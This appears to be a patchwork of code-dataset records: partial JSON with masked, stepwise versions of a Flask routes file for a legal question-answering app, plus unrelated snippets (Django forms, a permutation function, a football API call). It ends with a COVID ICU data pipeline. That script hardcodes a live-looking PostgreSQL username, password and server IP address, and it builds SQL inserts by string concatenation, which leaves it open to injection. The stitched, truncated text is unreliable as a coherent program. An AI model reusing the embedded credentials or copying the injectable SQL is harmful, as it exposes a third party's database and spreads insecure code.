"step-1": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n<mask token>\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-2": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n<mask token>\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-3": "<mask token>\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start = time.clock()\n finder = answerFinder()\n answer = finder.findANDpack(word)\n end = time.clock()\n print(str(end - start))\n return render_template('answer.html', title='Answer', answer=answer)\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-4": "<mask token>\nfrom datetime import datetime\nfrom flask import render_template, redirect, url_for, request, jsonify\nfrom athena_App import app\nfrom athena_App.formClass import QuestionForm\nimport time\nfrom athena_App.layer_frontInteracting.qa_module import answerFinder\nfrom athena_App.layer_frontInteracting.kg_module import knowledgeSearch\nfrom athena_App.layer_frontInteracting.case_module import caseQuery\n\n\n@app.route('/QAsearch', methods=['POST', 'GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer', word=question))\n return render_template('QAsearch.html', title='QAsearch Page', year=\n datetime.now().year, form=form, question=question)\n\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template('instruction.html', title='说明', year=datetime.\n now().year, message='Instruction')\n\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template('about.html', title='About', year=datetime.now()\n .year, message='Your application description page.')\n\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start = time.clock()\n finder = answerFinder()\n answer = finder.findANDpack(word)\n end = time.clock()\n print(str(end - start))\n return render_template('answer.html', title='Answer', answer=answer)\n\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template('newMain.html', title='Welcome Page', year=\n datetime.now().year)\n\n\n@app.route('/graph_search', methods=['get', 'post'])\ndef graph_search():\n return render_template('graph_search.html', title='Graph search page',\n year=datetime.now().year)\n\n\n@app.route('/knowledge_search', methods=['get', 'post'])\ndef knowledge_search():\n searchKnowledge = knowledgeSearch()\n des = request.args.get('description')\n json_data = searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n return jsonify(json_data)\n\n\n@app.route('/case_search_Test', methods=['get', 'post'])\ndef case_search_Test():\n return render_template('case_search_Test.html', title=\n 'Case search page', year=datetime.now().year)\n\n\n@app.route('/case_graph_search', methods=['get', 'post'])\ndef case_graph_search():\n caseDes = request.args.get('caseDes')\n case_graph_result = caseQuery(caseDes)\n pre_json_data = case_graph_result.getData()\n print(pre_json_data)\n return jsonify(pre_json_data)\n\n\n@app.route('/knife', methods=['get', 'post'])\ndef knife():\n return render_template('knife.html', title='KNIFE SEARCH', year=\n datetime.now().year)\n\n\n@app.route('/searchAll', methods=['get', 'post'])\ndef searchAll():\n pass\n",
"step-5": "\"\"\"\nRoutes and views for the flask application.\n\"\"\"\n\nfrom datetime import datetime\nfrom flask import render_template, redirect, url_for, request, jsonify\nfrom athena_App import app\nfrom athena_App.formClass import QuestionForm\n\nimport time\n\n#attention:\n#this module include large word vector which need a lot of time to load\n#turn it off when when you debugging other module\n#\n#from athena_App.data_process.es_QAsearch import *\n#\n\n#from athena_App.data_process.keywordCompare import Keyword_Compare, Answer\n#from athena_App.data_process.word2vecCompareModel import *\n\n#from athena_App.data_process.graph_query import *\n\n#from athena_App.openlaw.graphOfcase_query_echart import *\n\n#reconstruct series\n\nfrom athena_App.layer_frontInteracting.qa_module import answerFinder\nfrom athena_App.layer_frontInteracting.kg_module import knowledgeSearch\nfrom athena_App.layer_frontInteracting.case_module import caseQuery\n\n\n@app.route('/QAsearch', methods=['POST','GET'])\ndef QAsearch():\n \"\"\"Renders the QAsearch page.\"\"\"\n question = ''\n form = QuestionForm()\n question = form.question.data\n if form.validate_on_submit():\n return redirect(url_for('answer',word=question))\n return render_template(\n 'QAsearch.html',\n title = 'QAsearch Page',\n year = datetime.now().year,\n form = form,\n question = question\n )\n\n@app.route('/instruction')\ndef instruction():\n \"\"\"Renders the instruction page.\"\"\"\n return render_template(\n 'instruction.html',\n title='说明',\n year=datetime.now().year,\n message='Instruction'\n )\n\n@app.route('/about')\ndef about():\n \"\"\"Renders the about page.\"\"\"\n return render_template(\n 'about.html',\n title='About',\n year=datetime.now().year,\n message='Your application description page.'\n )\n\n@app.route('/answer/<word>')\ndef answer(word):\n \"\"\"Renders the answer page\"\"\"\n print(word)\n start=time.clock()\n finder=answerFinder()\n answer=finder.findANDpack(word)\n end=time.clock()\n print(str(end-start))\n return render_template(\n 'answer.html',\n title='Answer',\n answer=answer\n )\n\n@app.route('/main')\n@app.route('/')\ndef main():\n return render_template(\n 'newMain.html',\n title = 'Welcome Page',\n year = datetime.now().year\n )\n\n@app.route('/graph_search',methods=['get','post'])\ndef graph_search():\n return render_template(\n 'graph_search.html',\n title = 'Graph search page',\n year = datetime.now().year)\n\n@app.route('/knowledge_search',methods=['get','post'])\ndef knowledge_search():\n\n #initialize graph search object\n searchKnowledge=knowledgeSearch()\n\n des=request.args.get('description')\n json_data=searchKnowledge.getTotalData_forKnowledgeSearch(des)\n print(json_data)\n\n return jsonify(json_data)\n\n@app.route('/case_search_Test',methods=['get','post'])\ndef case_search_Test():\n return render_template(\n 'case_search_Test.html',\n title = 'Case search page',\n year = datetime.now().year)\n\n@app.route('/case_graph_search',methods=['get','post'])\ndef case_graph_search():\n\n caseDes=request.args.get('caseDes')\n #initialize graph search object\n case_graph_result=caseQuery(caseDes)\n\n pre_json_data=case_graph_result.getData()\n print(pre_json_data)\n\n return jsonify(pre_json_data)\n\n@app.route('/knife',methods=['get','post'])\ndef knife():\n return render_template(\n 'knife.html',\n title = 'KNIFE SEARCH',\n year = datetime.now().year\n )\n\n@app.route('/searchAll',methods=['get','post'])\ndef searchAll():\n pass",
"step-ids": [
9,
10,
11,
12,
13
]
}
|
[
9,
10,
11,
12,
13
] |
from . import scramsha1, scrammer
|
normal
|
{
"blob_id": "8c336edddadbf4689721b474c254ded061ecf4b5",
"index": 743,
"step-1": "<mask token>\n",
"step-2": "from . import scramsha1, scrammer\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
def get_perms(string):
toRtn = []
freq_table = count_letters(string)
get_perms_helper(freq_table, "", len(string), toRtn)
return toRtn
def count_letters(string):
freq = {}
for letter in string:
if letter not in freq:
freq[letter] = 0
freq[letter] += 1
return freq
def get_perms_helper(freq_table, prefix, remaining, result):
if remaining == 0:
result.append(prefix)
return
for letter in freq_table:
count = freq_table[letter]
if count > 0:
freq_table[letter] -= 1
get_perms_helper(freq_table, prefix + letter, remaining - 1, result)
freq_table[letter] = count
print get_perms("aaab")
|
normal
|
{
"blob_id": "719a993e1f5c5d1e803b04a5561373f2b9a5a5c2",
"index": 8524,
"step-1": "def get_perms(string):\n toRtn = []\n freq_table = count_letters(string)\n get_perms_helper(freq_table, \"\", len(string), toRtn)\n return toRtn\n\ndef count_letters(string):\n freq = {}\n for letter in string:\n if letter not in freq:\n freq[letter] = 0\n freq[letter] += 1\n return freq\n\ndef get_perms_helper(freq_table, prefix, remaining, result):\n if remaining == 0:\n result.append(prefix)\n return\n \n for letter in freq_table:\n count = freq_table[letter]\n if count > 0:\n freq_table[letter] -= 1\n get_perms_helper(freq_table, prefix + letter, remaining - 1, result)\n freq_table[letter] = count\n\nprint get_perms(\"aaab\")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import re
from collections import defaultdict
def count_words(sentence):
# extract all the words as per definition
sentence = re.findall(r"\b[\w'-]+\b", sentence.lower().replace('_', ' '))
counts = defaultdict(lambda: 0)
# Counting the frequency of each words
for word in sentence:
counts[word] += 1
return counts
|
normal
|
{
"blob_id": "7f5f16ea10980e0ade7357cdae38f47f8d7cdf01",
"index": 2446,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n",
"step-3": "import re\nfrom collections import defaultdict\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n",
"step-4": "import re\nfrom collections import defaultdict\n\ndef count_words(sentence):\n # extract all the words as per definition\n sentence = re.findall(r\"\\b[\\w'-]+\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda: 0)\n\n # Counting the frequency of each words\n for word in sentence:\n counts[word] += 1\n \n return counts\n ",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django import forms
from django.forms import widgets
# from product.models import PRODUCT_OTHER_CHOICE, PRODUCT_CATEGORY_CHOICES
PRODUCT_OTHER_CHOICE = 'other'
PRODUCT_CATEGORY_CHOICES = (
(PRODUCT_OTHER_CHOICE, 'Разное'),
('food', 'Еда'),
('drink', 'Вода'),
('cloth', 'Одежда'),
('electronics', 'Электроника')
)
class ProductForm(forms.Form):
name = forms.CharField(max_length=100, label='Наименование')
description = forms.CharField(max_length=2000, required=True, label='Описание', widget=forms.Textarea)
category = forms.ChoiceField(required=False, widget=forms.Select, choices=PRODUCT_CATEGORY_CHOICES, label='Категория')
amount = forms.IntegerField(min_value=0, label='Остаток')
price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')
class FindForm(forms.Form):
name = forms.CharField(max_length=100, label='Наименование')
|
normal
|
{
"blob_id": "e8a024796b6426e572571e46030678e90c537229",
"index": 7549,
"step-1": "<mask token>\n\n\nclass ProductForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-2": "<mask token>\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-3": "<mask token>\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (PRODUCT_OTHER_CHOICE, 'Разное'), ('food', 'Еда'), (\n 'drink', 'Вода'), ('cloth', 'Одежда'), ('electronics', 'Электроника')\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-4": "from django import forms\nfrom django.forms import widgets\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (PRODUCT_OTHER_CHOICE, 'Разное'), ('food', 'Еда'), (\n 'drink', 'Вода'), ('cloth', 'Одежда'), ('electronics', 'Электроника')\n\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label=\n 'Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select,\n choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n",
"step-5": "from django import forms\nfrom django.forms import widgets\n# from product.models import PRODUCT_OTHER_CHOICE, PRODUCT_CATEGORY_CHOICES\n\nPRODUCT_OTHER_CHOICE = 'other'\nPRODUCT_CATEGORY_CHOICES = (\n (PRODUCT_OTHER_CHOICE, 'Разное'),\n ('food', 'Еда'),\n ('drink', 'Вода'),\n ('cloth', 'Одежда'),\n ('electronics', 'Электроника')\n)\n\nclass ProductForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n description = forms.CharField(max_length=2000, required=True, label='Описание', widget=forms.Textarea)\n category = forms.ChoiceField(required=False, widget=forms.Select, choices=PRODUCT_CATEGORY_CHOICES, label='Категория')\n amount = forms.IntegerField(min_value=0, label='Остаток')\n price = forms.DecimalField(max_digits=7, decimal_places=2, label='Цена')\n\nclass FindForm(forms.Form):\n name = forms.CharField(max_length=100, label='Наименование')\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import http.client
import json
conn = http.client.HTTPSConnection("v3.football.api-sports.io")
headers = {
'x-rapidapi-host': "v3.football.api-sports.io",
'x-rapidapi-key': ""
}
conn.request("GET", "/teams/statistics?season=2016&team=768&league=4", headers=headers)
res = conn.getresponse()
data = res.read()
pretty = json.loads(data)
|
normal
|
{
"blob_id": "a6617934c5e6527cf59225a5d159d1ce8a33db50",
"index": 6681,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\n<mask token>\n",
"step-3": "<mask token>\nconn = http.client.HTTPSConnection('v3.football.api-sports.io')\nheaders = {'x-rapidapi-host': 'v3.football.api-sports.io', 'x-rapidapi-key': ''\n }\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n",
"step-4": "import http.client\nimport json\nconn = http.client.HTTPSConnection('v3.football.api-sports.io')\nheaders = {'x-rapidapi-host': 'v3.football.api-sports.io', 'x-rapidapi-key': ''\n }\nconn.request('GET', '/teams/statistics?season=2016&team=768&league=4',\n headers=headers)\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n",
"step-5": "import http.client\nimport json\n\nconn = http.client.HTTPSConnection(\"v3.football.api-sports.io\")\n\nheaders = {\n 'x-rapidapi-host': \"v3.football.api-sports.io\",\n 'x-rapidapi-key': \"\"\n }\n\nconn.request(\"GET\", \"/teams/statistics?season=2016&team=768&league=4\", headers=headers)\n\nres = conn.getresponse()\ndata = res.read()\npretty = json.loads(data)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# csv URL
url = "https://covid19-dashboard.ages.at/data/CovidFallzahlen.csv"
# read csv from URL
import pandas as pd
import geopandas as gpd
import numpy as np
df=pd.read_csv(url,sep=";")
df.to_csv("/var/www/FlaskApp/FlaskApp/data/covid_data.csv",sep=";",index=False)
# transforming timestamps to proper DateTime format
import datetime as dt
from datetime import datetime
import time
timestamps = []
for i in df["MeldeDatum"]:
i = i.replace(".","")
i = i.replace(":","")
timestamps.append(dt.datetime.strptime(i, "%d%m%Y %H%M%S"))
df["MeldeDatum"] = timestamps
df = df.drop(["Meldedat"], axis=1)
# get List of State Names
states = list(df["Bundesland"].unique())
# append total hospitalizations to DF
l_temp = []
for a,b in zip(df["FZHosp"],df["FZICU"]):
l_temp.append(a+b)
df["Hospitalizations_total"] = l_temp
# append total ICU capacity to DF
l_temp = []
for a,b in zip(df["FZICU"],df["FZICUFree"]):
l_temp.append(a+b)
df["ICU_capacity"] = l_temp
# append ICU occupancy percentages to DF
l_temp = []
for a,b in zip(df["FZICU"],df["ICU_capacity"]):
try:
l_temp.append(100.0 * float(a)/float(b))
except ZeroDivisionError:
l_temp.append(0.0)
df["ICU_perc"] = l_temp
# create list of dataframes by Bundesland
ls_df = []
for i in states:
temp = df[df["Bundesland"]==i]
ls_df.append(temp)
# importing adm0 and adm1 shapefilesas geopandas dataframes
adm1 = gpd.read_file("/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_1.shp")
adm0 = gpd.read_file("/var/www/FlaskApp/FlaskApp/data/gadm36_AUT_0.shp")
#writing to json
#adm1.to_file("data/austria_adm1.geojson", driver="GeoJSON")
#adm0.to_file("data/austria_adm0.geojson", driver="GeoJSON")
# save CSV after manipulating & rounding
df = df.round(1)
df.to_csv("/var/www/FlaskApp/FlaskApp/data/ICU_data.csv")
# create most recent DF for map
most_recent_date = df['MeldeDatum'].max()
df2 = df.loc[df['MeldeDatum'] == most_recent_date]
df2.to_pickle("/var/www/FlaskApp/FlaskApp/data/df2.pkl")
# join geometries with most recent data per state
df_map =gpd.read_file("/var/www/FlaskApp/FlaskApp/data/austria_adm1.geojson")
df_map["Bundesland"] = df_map["NAME_1"]
df_map = pd.merge(df2,df_map,on="Bundesland")
df_map = gpd.GeoDataFrame(df_map, geometry="geometry")
df_map.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_map.pkl")
# drop unused columns and save file in data folder
df_map.drop(["BundeslandID","GID_0","NAME_0","NAME_1","GID_1","VARNAME_1","NL_NAME_1","TYPE_1","ENGTYPE_1","CC_1","HASC_1","test_value"],axis=1).to_csv("/var/www/FlaskApp/FlaskApp/data/df_map.csv",index=False)
"""
CREATE DFs FOR UPDATE GRAPHS
"""
df_perc = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["ICU_perc"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["ICU_perc"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["ICU_perc"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["ICU_perc"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["ICU_perc"]),
"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["ICU_perc"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["ICU_perc"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["ICU_perc"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["ICU_perc"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["ICU_perc"]),
})
df_perc.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_perc.pkl")
df_FZICU = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["FZICU"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["FZICU"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["FZICU"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["FZICU"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["FZICU"]),
"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["FZICU"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["FZICU"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["FZICU"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["FZICU"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["FZICU"]),
})
df_FZICU.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_FZICU.pkl")
df_ICU_cap = pd.DataFrame({
"MeldeDatum": np.asarray(df.loc[df['Bundesland'] == "Alle"]["MeldeDatum"]),
"Alle": np.asarray(df.loc[df['Bundesland'] == "Alle"]["ICU_capacity"]),
"Burgenland": np.asarray(df.loc[df["Bundesland"] == "Burgenland"]["ICU_capacity"]),
"Kärnten": np.asarray(df.loc[df['Bundesland'] == "Kärnten"]["ICU_capacity"]),
"Niederösterreich": np.asarray(df.loc[df["Bundesland"] == "Niederösterreich"]["ICU_capacity"]),
"Oberösterreich": np.asarray(df.loc[df['Bundesland'] == "Oberösterreich"]["ICU_capacity"]),
"Salzburg": np.asarray(df.loc[df["Bundesland"] == "Salzburg"]["ICU_capacity"]),
"Steiermark": np.asarray(df.loc[df['Bundesland'] == "Steiermark"]["ICU_capacity"]),
"Tirol": np.asarray(df.loc[df["Bundesland"] == "Tirol"]["ICU_capacity"]),
"Vorarlberg": np.asarray(df.loc[df['Bundesland'] == "Vorarlberg"]["ICU_capacity"]),
"Wien": np.asarray(df.loc[df["Bundesland"] == "Wien"]["ICU_capacity"]),
})
df_ICU_cap.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_ICU_cap.pkl")
# Writing to logfile
file_object = open('/var/www/FlaskApp/FlaskApp/log.txt', 'a')
now = datetime.now() # current date and time
date_time = now.strftime("%m/%d/%Y, %H:%M:%S")
file_object.write('Success: '+date_time+"\n")
file_object.close()
"""
DB CONNECTOR
"""
# DB create string from csv for COVID data
import csv
with open('/var/www/FlaskApp/FlaskApp/data/covid_data.csv', 'r') as f:
instr = ""
reader = csv.reader(f,delimiter=";")
#print(reader)
next(reader) # Skip the header row.
for row in reader:
instr=instr+("INSERT INTO icu_data VALUES ('"+str(row[0])+"','"+str(row[1])+"','"+str(row[2])+"','"+str(row[3])+"','"+str(row[4])+"','"+str(row[5])+"','"+str(row[6])+"','"+str(row[7])+"','"+str(row[8])+"');" )
# DB create string from csv for MAP data
import csv
import sys
csv.field_size_limit(sys.maxsize)
with open('/var/www/FlaskApp/FlaskApp/data/df_map.csv', 'r') as f:
instr_map = ""
reader = csv.reader(f,delimiter=",")
#print(reader)
next(reader) # Skip the header row.
for row in reader:
instr_map=instr_map+("INSERT INTO icu_map VALUES ('"+str(row[0])+"','"+str(row[1])+"','"+str(row[2])+"','"+str(row[3])+"','"+str(row[4])+"','"+str(row[5])+"','"+str(row[6])+"','"+str(row[7])+"','"+str(row[8])+"','"+str(row[9])+"','"+str(row[10])+"');" )
""" connecting to DB, parsing SQL statements """
def csv_parser(statement):
import psycopg2
return_ls = []
try:
connection = psycopg2.connect(user="icu_bot",
password="5B2xwP8h4Ln4Y8Xs",
host="85.214.150.208",
port="5432",
database="ICU")
cursor = connection.cursor()
sql_Query = statement
#print(sql_Query)
cursor.execute(sql_Query)
connection.commit()
#print("Selecting rows from mobile table using cursor.fetchall")
#mobile_records = cursor.fetchall()
#print("Print each row and it's columns values")
#for row in mobile_records:
# return_ls.append(list(row))
except (Exception, psycopg2.Error) as error :
print ("Error while fetching data from PostgreSQL: ", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
#print("PostgreSQL connection is closed")
return return_ls
# update database in postgis
csv_parser("DELETE FROM icu_data")
csv_parser(instr)
# Update map data in server
csv_parser("DELETE FROM icu_map")
csv_parser(instr_map)
"""
GeoServer Connector
"""
try:
df_geojson = pd.read_json("https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson")
df_geojson.to_pickle("/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl")
except:
print("an exception occured connecting to the geoserver")
|
normal
|
{
"blob_id": "516ea681a55255e4c98e7106393180f9ad2e0250",
"index": 8455,
"step-1": "<mask token>\n\n\ndef csv_parser(statement):\n import psycopg2\n return_ls = []\n try:\n connection = psycopg2.connect(user='icu_bot', password=\n '5B2xwP8h4Ln4Y8Xs', host='85.214.150.208', port='5432',\n database='ICU')\n cursor = connection.cursor()\n sql_Query = statement\n cursor.execute(sql_Query)\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print('Error while fetching data from PostgreSQL: ', error)\n finally:\n if connection:\n cursor.close()\n connection.close()\n return return_ls\n\n\n<mask token>\n",
